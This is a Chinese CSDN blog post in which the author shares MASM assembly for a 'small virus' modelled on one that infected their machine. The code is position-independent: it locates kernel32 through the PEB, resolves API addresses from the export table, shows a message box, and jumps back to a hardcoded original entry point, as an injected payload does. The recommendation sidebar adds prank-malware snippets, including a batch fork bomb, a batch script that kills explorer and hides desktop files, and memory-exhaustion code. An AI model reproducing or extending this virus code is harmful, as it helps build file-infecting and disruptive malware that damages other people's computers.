自己写的小病毒

最新推荐文章于 2024-05-18 16:56:34 发布
最新推荐文章于 2024-05-18 16:56:34 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 汇编 文章标签: 汇编 user include byte c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aspbasicer/article/details/291846
版权

前年写的病毒,当时中了劳拉病毒,然后我照的它写了一个,参考了好多资料,主要是386汇编和PE文件结构的资料,个人感觉汇编什么的不是很难,当时我还不太熟悉宏汇编,不然可以有更简洁的代码
.486
      .model flat, stdcall
      option casemap :none
include /MASM32/INCLUDE/windows.inc
.code
start:
  call pstart
pstart:
  pop ebx       ;mov ebx,dword ptr [esp]
  sub ebx,offset pstart   ;//ebx为重定位信息,现在应该是0
  push ebp      ;//保存程序开始时的EBP
  mov ebp,esp
  sub esp,80h     ;//根据变量改变40h
  mov dword ptr [ebp-4],ebx  ;//保存到Pbase
;///getKernelBase///
  mov eax, ss:[30h]
  test eax,eax
  js loc1
  mov eax, dword ptr [eax + 0Ch]
  mov esi, dword ptr [eax + 1Ch]
  lodsd           
  mov eax, dword ptr [eax+8]
  jmp loc2
loc1:
  mov eax,dword ptr [eax+34h]
  mov eax,dword ptr [eax+0B8h]
loc2:
  mov dword ptr [ebp-10h],eax
  push ebp      ;//保存变量表指针EBP
  mov ebp,eax        ;//ebp=Kbase
;///Get GetProcAddress's EnterPoint//
  mov eax,dword ptr [ebp+3Ch]
  mov edx,dword ptr [ebp+eax+120]
  add edx,ebp
  mov ecx,dword ptr [edx+24]  ;//number
  mov ebx,dword ptr [edx+28]  ;// at=esp+4
  push dword ptr [edx+32]  ;//npt=esp
;
   mov edi,esp
            sub edi,10h
  mov dword ptr [edi],50746547h
  mov dword ptr [edi+4],41636f72h       ; 要改
  mov dword ptr [edi+8],65726464h
  mov dword ptr [edi+0Ch],00007373h  
;
findstart:
  dec ecx
  xor edx,edx
  mov esi,dword ptr [esp]
  add esi,ebp
  mov esi,dword ptr [esi]
  add esi,ebp
cmpbyte:
  lodsb
  cmp al,byte ptr [edi+edx]
  jne notsame
  cmp edx,14
  je find
  inc edx
  loop cmpbyte
  jmp cantfind
notsame:
  add dword ptr [esp],4
  add ebx,4
  jmp findstart
cantfind:
  xor eax,eax
  jmp findend
find:
  add ebx,ebp
  mov eax,dword ptr[ebx]
  add eax,ebp
findend:
  add esp,4
  pop ebp       ;//pop出变量表指针
  mov dword ptr [ebp-0Ch],eax  ;//保存GetProcAddress的函数入口点
;/
  mov ebx,dword ptr [ebp-4]
  mov edx,offset LoadLibrary    ;//LoadLibrary
  add edx,ebx
  push edx
  push dword ptr [ebp-10h]
  call dword ptr [ebp-0Ch]    ;//获得LoadLibrary的地址
  mov dword ptr [ebp-14h],eax

  mov edx,offset USER32     ;//user32.dll
  add edx,ebx 
  push edx
  call eax        ;//调用LoadLibrary

  mov edx,offset messagebox     ;//user32.dll
  add edx,ebx

  push edx
  push eax
  call dword ptr [ebp-0Ch]   ;//获得MessageBoxA的地址

  push 0
  push edx
  push edx
  push 0
  call eax
  
  nop
  nop

;//
  add esp,80h     ;//根据变量改变40h
  pop ebp
  jmp pend
;
LoadLibrary:
            db "LoadLibraryA",0
USER32:
            db "user32.dll",0
messagebox:
  db "MessageBoxA",0
pend:
  mov eax,0041c560h   ;//转到正常的程序入口点
  jmp eax 
  nop
  nop
  nop
  nop
  nop
  nop
  nop

end start

aspbasicer
关注
专栏目录
html病毒,用bat的一个小病毒
weixin_42312133的博客
06-15 989
用了三天才看完=。=,感觉作者整理整理可以把博客当书买了。。。然后自己突发其想,想到了一个小病毒程序,其实也算不上病毒,只能算是个恶作剧程序吧,其原理就是不断打开cmd程序,占用系统资源。。。呵呵。。让大神见笑了=。=windows.batstart cmd%0用户打开这个程序之后,程序就会不断打开cmd,占用系统资源,导致系统瘫痪。%0是再次执行该程序的意思。但是,这样只能让用户死机一次。。。。...
一个自己的bat病毒
Leo_WangZijie的博客
07-25 968
Hello,我是Leo鸭,今天我为大家带来一个自己病毒样本: @echo off title 你中毒了!~ByLeo~ set i=0 taskkill /f /im explorer.exe cd /d "%userprofile%\desktop\" attrib +s +h *.* :vir cls color 4f echo. echo Q:我的电脑怎么了? echo. echo A:你的电脑炸了... echo. echo -----------------------------------
病毒
weixin_52050936的博客
03-16 148
import os def func(path, n): lst = os.listdir(path) for name in lst: real_path = os.path.join(path, name) if os.path.isdir(real_path): print("|---"*n + name) func(real_path, n+1) else: pr
如何一个简单的病毒程序
Chinawash 专栏
06-25 6091
引:前些天学病毒这门技术着实吃了很多苦头,走了很多弯路,尽管按我的知识水平,病毒已经是水到渠成的学习内容了。但是我现在学了入门才发现这门技术实际 上隐藏着很多玄机,包含着许多技术,不专门学习研究根本无法达到“牛”的境界上去。如今了这篇文章,介绍的都是相当实用的东西,可以让你少走许多弯路 (有时侯一个错误够你找几个小时的)。不过需要些基础知识才能看懂。假如你有天知识储备够了,不学学病毒将是你的遗憾
好笑,一个病毒
凡人凡居
08-23 2346
一个病毒 这是答案,我只能淡淡的笑,这是什么卵.搞死别人就是病毒了?while (1){int *p = new int[10000000];}
教你一个简单实用的病毒
qq_36916968的博客
12-08 2650
首先,打开记事本,输入 Const strPassword = “sigaide”’ Dim WshNetwork Set WshNetwork = CreateObject(“WScript.Network”) Dim userName userName = WshNetwork.userName&",user" Dim Domain Set Domain = GetObject(“Wi...
用bat的一个小病毒
weixin_34179968的博客
12-20 4352
最近看了一点bat的知识,具体说是看了一个博客:http://blog.csdn.net/qsyzb/article/details/17364581 用了三天才看完=。=,感觉作者整理整理可以把博客当书买了。。。 然后自己突发其想,想到了一个小病毒程序,其实也算不上病毒,只能算是个恶作剧程序吧,其原理就是不断打开cmd程序,占用系统资源。。。呵呵。。让大神见笑了=。= window...
自己动手病毒—ELF文件病毒
02-01
【自己动手病毒—ELF文件病毒】 在深入探讨如何编ELF文件病毒之前,我们需要先理解ELF文件格式的基本概念。ELF(Executable and Linkable Format)是Linux和其他类UNIX系统中广泛使用的二进制文件格式,用于可...
用C++一个简单小病毒(零基础奶妈级教学,不可能学完还不懂)
热门推荐
foxifigo0的博客
07-18 1万+
C++简单病毒讲解:8行代码一个小病毒,3秒卡死电脑!零基础教学
用python制作勒索病毒_用c一个小勒索病毒(用B站来学习)
weixin_39743414的博客
11-30 3098
前言:这里是根据B站上的一个视频,看着教学的,一下是我对代码的分块解析记录,方便想入门病毒和反病毒小工具的人学习。准备vc++2013b站学习视频新建项目我就是一开始新建项目都不清楚,原来一直用devc++image.png需要注意的是这里的配置配置2代码编部分1.思路1>遍历指定目录或当前目录下所有文件(这里用到了递归查询)2>对指定文件加密2.对单个文件进行加密如何对文件加密,那个老师讲...
ZOJ Problem Set – 2003 Substitution Cipher
06-14
Antique Comedians of Malidinesia would like to play a new discovered comedy of Aristofanes. Putting it on a stage should be a big surprise for the audience so all the preparations must be kept absolutely secret. The ACM director suspects one of his competitors of reading his correspondece. To prevent other companies from revealing his secret, he decided to use a substitution cipher in all the letters mentioning the new play. Substitution cipher is defined by a substitution table assigning each character of the substitution alphabet another character of the same alphabet. The assignment is a bijection (to each character exactly one character is assigned -- not neccessary different). The director is afraid of disclosing the substitution table and therefore he changes it frequently. After each change he chooses a few words from a dictionary by random, encrypts them and sends them together with an encrypted message. The plain (i.e. non-encrypted) words are sent by a secure channel, not by mail. The recipient of the message can then compare plain and encrypted words and create a new substitution table. Unfortunately, one of the ACM cipher specialists have found that this system is sometimes insecure. Some messages can be decrypted by the rival company even without knowing the plain words. The reason is that when the director chooses the words from the dictionary and encrypts them, he never changes their order (the words in the dictionary are lexicographically sorted). String a1a2 ... ap is lexicografically smaller than b1b2 ... bq if there exists an integer i, i <= p, i <= q, such that aj=bj for each j, 1 <= j < i and ai < bi. The director is interested in which of his messages could be read by the rival company. You are to write a program to determine that. Input Output Sample Input 2 5 6 cebdbac cac ecd dca aba bac cedab 4 4 cca cad aac bca bdac Sample Output abcde Message cannot be decrypted.
简单的小病毒
11-05
【标题】"简单的小病毒"涉及的是计算机病毒的基础知识,主要关注的是病毒的编和传播机制,以及如何利用编程语言实现这一过程。在这个特定的例子中,病毒是使用Visual C++(VC)编的,这是一种广泛使用的C++集成...
简短的计算机病毒,最简单的电脑病毒
weixin_34471838的博客
07-14 9825
大家知道最简单的电脑病毒是什么吗?下面就让学习啦小编教大家做一个最简单的电脑病毒吧。最简单的电脑病毒的做法1.控制面板->文件资源管理器选项->查看->隐藏已知文件夹类型的扩展名,如果前面勾选了就取消勾选,没有勾选就不用管。2.新建一个文本文档,重命名为后缀为vbs的文件,如果第一步没有完成也就无法修改文件名的后缀。3.右键vbs文件编辑,现在可以开始正式编代码了。doset ...
病毒(恶作剧)与小宏病毒的学习
weixin_50464560的博客
03-17 1832
1、编病毒,运用rar自解压功能完成病毒植入。 第一个小病毒 咱来编一下 双击运行之 来了来了它来了,幸好设置的时间比较长,不然就来不及关掉它了~ 如果要制作小病毒(恶作剧),可以设置成1s,放在别人的主机里运行,我是不知道会不会被打,因为我没试过哦嘻嘻 在cmd中敲上这个命令,它就没了 第二个小病毒 敲它 双击运行 其实它们都是C盘啦 那么如何删除呢 来 这就删除了 这里拓展一下 多了”@echo off”这一语句,这里就不会像之前那样显示那么多了。”@echo off”的意思是在
用Python编个小病毒
cgy091107的博客
02-11 2025
python 病毒
Python实现小病毒
sk6584631_sz的博客
07-17 5600
qwq
python小病毒
tico2011的博客
11-11 729
Python小病毒
python简单的病毒编程代码,如何用python做恶搞病毒
Bxwfjdjdbdgj的博客
03-10 1092
def take_photoes(self): while True: time.sleep(10) # 图片路径,同时带上路径+时间 photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S')) cap = None try: # VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…然后服务器套接字继续处于监听,接收其他客户端套接字的连接请求。
制作一个简单的python病毒
最新发布
imsfd的博客
05-18 397
大家都知道电脑病毒,有的人会想着自己做一个病毒,那到底怎么做,用任何编程语言都可以做一个比较简单的病毒,那用python该怎么做?:是一个死循环,就是在while循环里,每次条件都成立,一直运行下级代码:输出'病毒来袭'字符串,新建窗口。先导入OS库,因为os库里有很多系统命令,例如。一直循环,直到电脑报废才结束。
如何用python病毒
06-01
对于这个问题,我必须强调,编和传播计算机病毒是不道德和非法的行为,会对他人的计算机造成严重的损害和风险。因此,我不会提供任何有关如何编...你可以通过学习这些方面来提高自己的技能,而不是去编病毒
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值